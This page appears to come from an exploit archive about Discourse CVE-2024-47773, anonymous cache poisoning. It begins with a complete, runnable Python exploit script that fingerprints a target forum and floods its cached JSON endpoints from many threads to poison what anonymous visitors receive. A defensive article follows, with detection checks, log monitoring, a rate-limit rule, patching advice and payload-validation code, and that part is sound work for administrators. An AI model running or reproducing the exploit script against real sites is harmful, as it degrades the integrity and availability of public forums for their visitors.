Discourse 3.2.x - Anonymous Cache Poisoning

Exploit Author: İbrahimsql
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Python
Published Date: 2025-07-08

#!/usr/bin/env python3
"""
Exploit Title: Discourse 3.2.x - Anonymous Cache Poisoning
Date: 2024-10-15
Exploit Author: ibrahimsql
Github: https://github.com/ibrahmsql
Vendor Homepage: https://discourse.org
Software Link: https://github.com/discourse/discourse
Version: Discourse < latest (patched)
Tested on: Discourse 3.1.x, 3.2.x
CVE: CVE-2024-47773
CVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)

Description:
Discourse anonymous cache poisoning vulnerability allows attackers to poison
the cache with responses without preloaded data through multiple XHR requests.
This affects only anonymous visitors of the site.

Reference:
https://nvd.nist.gov/vuln/detail/CVE-2024-47773
"""

import requests
import sys
import argparse
import time
import threading
import json
from urllib.parse import urljoin

class DiscourseCachePoisoning:
    def __init__(self, target_url, threads=10, timeout=10):
        self.target_url = target_url.rstrip('/')
        self.threads = threads
        self.timeout = timeout
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'application/json, text/javascript, */*; q=0.01',
            'X-Requested-With': 'XMLHttpRequest'
        })
        self.poisoned = False
        
    def check_target(self):
        """Check if target is accessible and running Discourse"""
        try:
            response = self.session.get(f"{self.target_url}/", timeout=self.timeout)
            if response.status_code == 200:
                if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text:
                    return True
        except Exception as e:
            print(f"[-] Error checking target: {e}")
        return False
    
    def check_anonymous_cache(self):
        """Check if anonymous cache is enabled"""
        try:
            # Test endpoint that should be cached for anonymous users
            response = self.session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
            
            # Check cache headers
            cache_headers = ['cache-control', 'etag', 'last-modified']
            has_cache = any(header in response.headers for header in cache_headers)
            
            if has_cache:
                print("[+] Anonymous cache appears to be enabled")
                return True
            else:
                print("[-] Anonymous cache may be disabled")
                return False
                
        except Exception as e:
            print(f"[-] Error checking cache: {e}")
            return False
    
    def poison_cache_worker(self, endpoint):
        """Worker function for cache poisoning attempts"""
        try:
            # Create session without cookies to simulate anonymous user
            anon_session = requests.Session()
            anon_session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
                'Accept': 'application/json, text/javascript, */*; q=0.01',
                'X-Requested-With': 'XMLHttpRequest'
            })
            
            # Make rapid requests to poison cache
            for i in range(50):
                response = anon_session.get(
                    f"{self.target_url}{endpoint}",
                    timeout=self.timeout
                )
                
                # Check if response lacks preloaded data
                if response.status_code == 200:
                    try:
                        data = response.json()
                        # Check for missing preloaded data indicators
                        if self.is_poisoned_response(data):
                            print(f"[+] Cache poisoning successful on {endpoint}")
                            self.poisoned = True
                            return True
                    except:
                        pass
                        
                time.sleep(0.1)
                
        except Exception as e:
            pass
        return False
    
    def is_poisoned_response(self, data):
        """Check if response indicates successful cache poisoning"""
        # Look for indicators of missing preloaded data
        indicators = [
            # Missing or empty preloaded data
            not data.get('preloaded', True),
            data.get('preloaded') == {},
            # Missing expected fields
            'categories' in data and not data['categories'],
            'topics' in data and not data['topics'],
            # Error indicators
            data.get('error') is not None,
            data.get('errors') is not None
        ]
        
        return any(indicators)
    
    def test_cache_poisoning(self):
        """Test cache poisoning on multiple endpoints"""
        print("[*] Testing cache poisoning vulnerability...")
        
        # Target endpoints that are commonly cached
        endpoints = [
            '/categories.json',
            '/latest.json',
            '/top.json',
            '/c/general.json',
            '/site.json',
            '/site/basic-info.json'
        ]
        
        threads = []
        
        for endpoint in endpoints:
            print(f"[*] Testing endpoint: {endpoint}")
            
            # Create multiple threads to poison cache
            for i in range(self.threads):
                thread = threading.Thread(
                    target=self.poison_cache_worker,
                    args=(endpoint,)
                )
                threads.append(thread)
                thread.start()
            
            # Wait for threads to complete
            for thread in threads:
                thread.join(timeout=5)
            
            if self.poisoned:
                break
                
            time.sleep(1)
        
        return self.poisoned
    
    def verify_poisoning(self):
        """Verify if cache poisoning was successful"""
        print("[*] Verifying cache poisoning...")
        
        # Test with fresh anonymous session
        verify_session = requests.Session()
        verify_session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })
        
        try:
            response = verify_session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    if self.is_poisoned_response(data):
                        print("[+] Cache poisoning verified - anonymous users affected")
                        return True
                    else:
                        print("[-] Cache poisoning not verified")
                except:
                    print("[-] Unable to parse response")
            else:
                print(f"[-] Unexpected response code: {response.status_code}")
                
        except Exception as e:
            print(f"[-] Error verifying poisoning: {e}")
        
        return False
    
    def exploit(self):
        """Main exploit function"""
        print(f"[*] Testing Discourse Cache Poisoning (CVE-2024-47773)")
        print(f"[*] Target: {self.target_url}")
        
        if not self.check_target():
            print("[-] Target is not accessible or not running Discourse")
            return False
        
        print("[+] Target confirmed as Discourse instance")
        
        if not self.check_anonymous_cache():
            print("[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)")
            print("[*] Continuing with exploit attempt...")
        
        success = self.test_cache_poisoning()
        
        if success:
            print("[+] Cache poisoning attack successful!")
            self.verify_poisoning()
            print("\n[!] Impact: Anonymous visitors may receive responses without preloaded data")
            print("[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE")
            return True
        else:
            print("[-] Cache poisoning attack failed")
            print("[*] Target may be patched or cache disabled")
            return False

def main():
    parser = argparse.ArgumentParser(description='Discourse Anonymous Cache Poisoning (CVE-2024-47773)')
    parser.add_argument('-u', '--url', required=True, help='Target Discourse URL')
    parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)')
    parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10)')
    
    args = parser.parse_args()
    
    exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout)
    
    try:
        success = exploit.exploit()
        sys.exit(0 if success else 1)
    except KeyboardInterrupt:
        print("\n[-] Exploit interrupted by user")
        sys.exit(1)
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        sys.exit(1)

if __name__ == '__main__':
    main()

Discourse 3.2.x — Anonymous Cache Poisoning (CVE-2024-47773)

This article describes the CVE-2024-47773 "anonymous cache poisoning" issue that affected Discourse (notably 3.1.x and 3.2.x at the time of disclosure). It covers the high-level technical root cause, impact, safe detection and verification techniques, mitigation and hardening guidance, and incident response considerations for administrators and security engineers. The goal is to provide defensive, actionable guidance while avoiding step-by-step exploit construction.

Executive summary

CVE: CVE-2024-47773
Severity: CVSS 7.1 (High — integrity impact; network attack surface; no user interaction)
Affected: Discourse instances prior to the upstream patch (reported against 3.1.x, 3.2.x variants)
Impact: Anonymous visitors could receive cached API responses that lack expected "preloaded" data or contain malformed or missing fields, so other anonymous clients are served content with integrity problems.
Primary mitigation: Upgrade Discourse to the fixed release(s) or apply recommended configuration changes (e.g., DISCOURSE_DISABLE_ANON_CACHE) and add defensive controls such as rate-limiting and WAF rules for anonymous/XHR endpoints.

Vulnerability at a glance

At a high level, the vulnerability stems from how Discourse served certain JSON endpoints for anonymous visitors and how those responses were cached. Under specific conditions, an unauthenticated client could cause responses without expected preloaded data (or with missing fields) to be cached and subsequently served to other anonymous users. The result was an integrity issue in publicly served responses: inconsistent data and potential UI breakage, with any further consequences depending on how the frontend consumes the payload.

Technical background (high-level)

Discourse maintains anonymous caching for some endpoints to improve scalability. Anonymous cache entries may be stored and reused across requests.
Some API endpoints supply "preloaded" metadata required by the frontend. If an initial cached response lacks that preloaded data, subsequent anonymous users may receive the incomplete payload.
The issue is not an authentication bypass: it affects only anonymous (non-authenticated) visitors. The primary risk is integrity loss — incorrect or incomplete content delivered to many visitors.
Because the attack surface consists of ordinary HTTP GET/XHR calls, mitigation focuses on ensuring correct caching behavior rather than on authentication controls.
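
The caching behavior described above can be illustrated with a toy model. The sketch below is not Discourse's cache code: the `Request`, `render`, `PathOnlyCache`, and `ContextAwareCache` names are hypothetical, and the assumption that XHR requests produce a response without a preloaded block is a simplification of the points in this section. It shows only why a cache key that ignores request context lets the first writer decide what every later visitor receives.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    path: str
    is_xhr: bool = False  # True when X-Requested-With: XMLHttpRequest is sent


def render(request: Request) -> dict:
    """Hypothetical renderer: XHR responses omit the preloaded block."""
    body = {"path": request.path}
    if not request.is_xhr:
        body["preloaded"] = {"site": "settings"}
    return body


class PathOnlyCache:
    """Flawed model: the cache key ignores the request context."""

    def __init__(self):
        self._store = {}

    def key(self, request: Request):
        return request.path

    def get(self, request: Request) -> dict:
        k = self.key(request)
        if k not in self._store:
            self._store[k] = render(request)
        return self._store[k]


class ContextAwareCache(PathOnlyCache):
    """Hardened model: the request context is part of the cache key."""

    def key(self, request: Request):
        return (request.path, request.is_xhr)


flawed = PathOnlyCache()
flawed.get(Request("/latest", is_xhr=True))   # first writer fills the entry
flawed_page = flawed.get(Request("/latest"))  # later visitor gets that entry

hardened = ContextAwareCache()
hardened.get(Request("/latest", is_xhr=True))
hardened_page = hardened.get(Request("/latest"))

print("preloaded" in flawed_page)    # False
print("preloaded" in hardened_page)  # True
```

Separating cache entries by request context is one possible hardening in this model; the upstream fix may take a different approach.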

Impact and risk model

The vulnerability's impact depends on the site, its content, and how the frontend uses the JSON payloads. Possible consequences include:

Front-end breakage or partially rendered pages due to missing preloaded data.
Misleading information or UI inconsistencies for anonymous visitors.
In contexts where the missing or malformed data interacts with other frontend logic, it could open secondary issues (e.g., inconsistent state that leads to client-side errors).
Because only anonymous users are affected, the risk to authenticated users and the risk of data exfiltration are lower; however, public reputation and availability are still at stake.

Vulnerability metadata

Field	Value
CVE	CVE-2024-47773
Product	Discourse
Affected Releases	3.1.x, 3.2.x (as reported)
CVSS	7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)
Primary impact	Integrity of cached anonymous responses

Safe detection and verification (what site owners should do)

Administrators should verify whether their instance is vulnerable and whether anonymous cached responses can be poisoned or are malformed. Do this in a controlled, defensive way: query endpoints once or a few times from an isolated test client or a staging instance. Avoid automated high-frequency requests against production that resemble exploitation.

Example: retrieve and inspect anonymous cached endpoint (safe)

curl -s -D - 'https://forum.example.com/categories.json' -H 'User-Agent: security-check/1.0' -o categories.json

This command fetches the /categories.json endpoint, prints the response headers, and saves the body to categories.json. It is a single benign request, suitable for checking cache headers (ETag, Cache-Control) and payload structure.

python3 -c "import json; data=json.load(open('categories.json')); print('preloaded' in data, isinstance(data.get('preloaded'), dict))"

This Python one-liner checks whether the JSON contains a top-level "preloaded" key and whether it looks like a dictionary. Use it to validate that the payload contains expected fields. These checks are non-destructive and intended for administrators to audit response integrity.

What to look for in headers and payloads

Cache-related headers: Cache-Control, ETag, Last-Modified — confirm whether anonymous responses are cached and with which directives.
Payload fields: confirm the presence of expected fields such as "preloaded", "categories", "topics" and that they look reasonable (not empty or null when they should contain data).
Unexpected "errors" or "error" fields in normal GET responses can indicate an issue.
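
The checklist above could be applied to one saved response with a small helper. This is a minimal sketch: `audit_response` is a hypothetical name, and the field names come from this article's checklist rather than from a documented Discourse response schema, so adjust them per endpoint. It only inspects data you already fetched and sends no requests.

```python
import json

CACHE_HEADERS = ("cache-control", "etag", "last-modified")
# Field names taken from this article's checklist (an assumption, not a schema).
CHECKED_FIELDS = ("preloaded", "categories", "topics")


def audit_response(headers: dict, body_text: str) -> list:
    """Return human-readable findings for one saved response."""
    findings = []
    lowered = {name.lower(): value for name, value in headers.items()}
    present = [h for h in CACHE_HEADERS if h in lowered]
    if present:
        findings.append("cache headers present: " + ", ".join(present))
    else:
        findings.append("no cache headers present")

    try:
        data = json.loads(body_text)
    except json.JSONDecodeError:
        findings.append("body is not valid JSON")
        return findings
    if not isinstance(data, dict):
        findings.append("top-level JSON value is not an object")
        return findings

    # Flag fields that are present but empty or null.
    for field in CHECKED_FIELDS:
        if field in data and not data[field]:
            findings.append(f"field '{field}' is empty or null")
    # Flag error indicators in what should be a normal GET response.
    for field in ("error", "errors"):
        if data.get(field) is not None:
            findings.append(f"unexpected '{field}' field in response")
    return findings


sample_findings = audit_response(
    {"ETag": 'W/"abc"'},
    '{"categories": [], "errors": ["boom"]}',
)
for finding in sample_findings:
    print(finding)
```

An empty list is not always a defect (a new forum may have no topics), so treat the findings as prompts for manual review rather than as verdicts.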

Logging and monitoring checks

Search access logs for unusually high rates of requests to JSON endpoints from a single IP address within a short time window. That could indicate probing attempts.
Alert on repeated 200 responses with empty/invalid payloads from anonymous endpoints.
Monitor frontend errors (client-side console logs) for spikes in rendering errors tied to anonymous users.
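
The first log check above can be sketched as a per-minute counter. The example assumes access logs in the common/combined log format; the `noisy_clients` name and the threshold of 20 requests per minute are illustrative choices, and the sample lines use documentation IP addresses.

```python
import re
from collections import Counter

# Matches the leading part of a common/combined log format line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def noisy_clients(lines, threshold=20):
    """Count .json requests per (ip, minute); return buckets above threshold."""
    buckets = Counter()
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue  # skip lines in an unexpected format
        path = match["path"].split("?", 1)[0]
        if not path.endswith(".json"):
            continue
        minute = match["ts"][:17]  # "15/Oct/2024:10:00", seconds and zone dropped
        buckets[(match["ip"], minute)] += 1
    return {key: count for key, count in buckets.items() if count > threshold}


sample = [
    f'203.0.113.5 - - [15/Oct/2024:10:00:{s:02d} +0000] "GET /latest.json HTTP/1.1" 200 512'
    for s in range(25)
] + [
    '198.51.100.7 - - [15/Oct/2024:10:00:05 +0000] "GET /categories.json HTTP/1.1" 200 900'
] * 3

flagged = noisy_clients(sample)
print(flagged)
```

If the site sits behind a CDN or reverse proxy, the logged address may be the proxy's, so the real client address would need to come from whatever forwarded-address field your logging setup records.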

Mitigation and hardening guidance

Focus on prompt patching plus layered mitigations to reduce the ability of unauthenticated actors to manipulate cache entries.

Primary remediation

Upgrade Discourse to a release that contains the fix for this CVE; the official Discourse release notes and security advisory identify the patched versions. Patching is the recommended primary fix.
If you cannot immediately patch, consider temporarily disabling anonymous caching via configuration options (e.g., DISCOURSE_DISABLE_ANON_CACHE) until you can apply the update. Note: this may increase load on your application and database, so plan capacity accordingly.

Operational controls (defense-in-depth)

Rate-limit anonymous/XHR requests to JSON endpoints — per-IP or per-source limits reduce the speed at which cache entries can be manipulated.
Employ Web Application Firewall (WAF) rules to detect and block suspicious rapid probing patterns to JSON endpoints. Rules should be conservative — avoid blocking legitimate crawlers.
Validate and sanitize JSON payloads in the frontend: if the UI expects preloaded metadata, fail gracefully and log missing data rather than rendering inconsistent state.
Use strict cache-control and vary headers to ensure cached responses include appropriate cache keys. For example, include "Vary" and appropriate Cache-Control directives so that caches do not inadvertently serve a response intended for a different request context.
Consider adding integrity checks on critical JSON responses, e.g., simple schema validation in the backend to avoid returning malformed payloads to caches.

Recommended WAF pseudo-rule (defensive, non-exploit)

# Pseudo-rule: limit the rate of anonymous JSON API calls to common endpoints.
# This is an example for guidance; translate to your WAF/signature language.
IF request.path startswith "/categories.json" OR request.path startswith "/latest.json" OR request.path startswith "/site.json"
AND request carries no authentication credentials (anonymous)
THEN apply rate-limit 20 requests/minute per IP and log if exceeded

This is a conceptual rule showing how to throttle anonymous access to sensitive JSON endpoints. Implementers must adapt the rule to their WAF and production traffic patterns to avoid false positives.
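
For teams that enforce throttling in application middleware instead of a WAF, the pseudo-rule could be expressed as a sliding-window limiter. This is a sketch under stated assumptions: `SlidingWindowLimiter` is a hypothetical class, state is kept in process memory (a multi-process deployment would need a shared store), and the caller is assumed to know whether the request is authenticated.

```python
import time
from collections import defaultdict, deque

# Path prefixes taken from the pseudo-rule above.
LIMITED_PREFIXES = ("/categories.json", "/latest.json", "/site.json")


class SlidingWindowLimiter:
    """Allow at most `limit` anonymous requests per IP within `window_seconds`."""

    def __init__(self, limit=20, window_seconds=60.0, clock=time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock  # injectable so the behavior can be tested
        self._hits = defaultdict(deque)

    def allow(self, ip: str, path: str, authenticated: bool) -> bool:
        if authenticated or not path.startswith(LIMITED_PREFIXES):
            return True
        now = self.clock()
        hits = self._hits[ip]
        # Drop timestamps that have left the window.
        while hits and now - hits[0] >= self.window:
            hits.popleft()
        if len(hits) >= self.limit:
            return False  # a real deployment would also log this event
        hits.append(now)
        return True


fake_now = [0.0]
limiter = SlidingWindowLimiter(clock=lambda: fake_now[0])
burst = [limiter.allow("203.0.113.5", "/latest.json", False) for _ in range(21)]
print(burst.count(True), burst.count(False))  # 20 1

fake_now[0] = 61.0
after_window = limiter.allow("203.0.113.5", "/latest.json", False)
print(after_window)  # True
```

The injected clock keeps the example deterministic; in production the default `time.monotonic` would be used.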

Incident response and remediation steps

Apply the upstream security patch as soon as it is available and test in staging before production deployment.
If you detect evidence of cache poisoning in production, clear the affected application caches and purge any downstream copies that may be tainted (e.g., CDN or reverse-proxy caches serving anonymous responses).
Investigate logs for suspicious access patterns and identify any client IP addresses that performed high-rate anonymous JSON access. Take appropriate blocking or throttling actions.
Assess user-facing impacts (broken pages, incorrect information) and prepare customer communications if public-facing content was substantially affected.

Safe code example: simple server-side schema validation (illustrative)

def validate_categories_payload(payload):
    # Defensive check — ensure required keys exist and have correct basic types.
    if not isinstance(payload, dict):
        return False
    if 'preloaded' not in payload:
        return False
    if not isinstance(payload.get('preloaded'), dict):
        return False
    # If 'categories' is present it must be a list (emptiness is not checked here)
    if 'categories' in payload and not isinstance(payload['categories'], list):
        return False
    return True

This example shows a minimal defensive function to validate whether a server-side JSON payload contains expected keys and types before caching or returning it. In practice, use a robust JSON schema validation library and integrate checks before responses are cached for reuse by anonymous clients.
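
To show where such a check could sit relative to caching, the sketch below wraps a hypothetical in-memory cache so that only payloads passing a validator are stored. `ValidatingCache` and `looks_complete` are illustrative names; `looks_complete` repeats the same basic checks as the function above so that the block is self-contained.

```python
from typing import Callable, Dict


def looks_complete(payload) -> bool:
    """Same basic checks as the validation example in this article."""
    return (
        isinstance(payload, dict)
        and isinstance(payload.get("preloaded"), dict)
        and isinstance(payload.get("categories", []), list)
    )


class ValidatingCache:
    """Hypothetical cache that stores only payloads accepted by a validator."""

    def __init__(self, validator: Callable[[object], bool]):
        self._validator = validator
        self._store: Dict[str, dict] = {}
        self.rejected = 0

    def fetch(self, key: str, producer: Callable[[], dict]) -> dict:
        if key in self._store:
            return self._store[key]
        payload = producer()
        if self._validator(payload):
            self._store[key] = payload
        else:
            self.rejected += 1  # worth logging in a real deployment
        return payload


cache = ValidatingCache(looks_complete)
incomplete = cache.fetch("/categories.json", lambda: {"categories": []})
complete = cache.fetch("/categories.json", lambda: {"preloaded": {}, "categories": []})
again = cache.fetch("/categories.json", lambda: {"categories": []})

print(cache.rejected)     # 1
print(again is complete)  # True
```

The incomplete payload is still returned to the caller that triggered it, but it is never stored, so it cannot be replayed to other visitors.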

Long-term architectural recommendations

Design caching layers with explicit cache validation and strong cache keys. Where frontend state is required, prefer server-side composition that guarantees completeness before caching.
Adopt automated regression tests that assert JSON endpoints contain required fields and do not return error indicators in normal operation.
Maintain a staged rollout and canary testing strategy for changes that affect caching behavior or anonymous API responses.
Keep a documented and tested incident response playbook for cache-related integrity incidents (including cache invalidation and CDN purge procedures).
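
The regression-test recommendation above might look like the following `unittest` sketch. The required-field contract is an assumption based on the fields discussed in this article, and `fetch_payload` returns a canned payload; a real suite would request the endpoint from a staging instance instead.

```python
import unittest

# Assumed contract for illustration; derive the real one from your endpoints.
REQUIRED_FIELDS = {"preloaded": dict, "categories": list}


def missing_or_mistyped(payload: dict) -> list:
    """Return the names of fields that violate the assumed contract."""
    problems = []
    for name, expected_type in REQUIRED_FIELDS.items():
        if not isinstance(payload.get(name), expected_type):
            problems.append(name)
    for name in ("error", "errors"):
        if payload.get(name) is not None:
            problems.append(name)
    return problems


class AnonymousPayloadContract(unittest.TestCase):
    def fetch_payload(self) -> dict:
        # Placeholder fixture standing in for a staging request.
        return {"preloaded": {"site": {}}, "categories": [{"id": 1}]}

    def test_required_fields_present(self):
        self.assertEqual(missing_or_mistyped(self.fetch_payload()), [])

    def test_incomplete_payload_is_flagged(self):
        self.assertEqual(missing_or_mistyped({"categories": []}), ["preloaded"])


suite = unittest.defaultTestLoader.loadTestsFromTestCase(AnonymousPayloadContract)
result = unittest.TextTestRunner(verbosity=0).run(suite)
```

Running the suite programmatically, as in the last two lines, makes it easy to embed in a larger check; in a normal project the test class would simply be discovered by the test runner.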

Summary and takeaways

CVE-2024-47773 highlighted the risks of anonymous caching when responses are not guaranteed to be complete before being stored and shared across clients. The safest remediation is to apply vendor patches. Meanwhile, operators should apply defensive controls — temporary configuration changes, rate-limiting, WAF rules, schema validation, and careful cache invalidation — to reduce risk and detect abuse. Regular security testing and observability into anonymous API endpoints will help reduce the chance of similar issues in the future.

References and further reading

Official NVD entry: CVE-2024-47773 (for CVSS and advisory metadata)
Discourse project repository and official release notes (for patched versions and changelogs)
Operational docs on cache control, CDN invalidation, and WAF configuration from your CDN/WAF vendor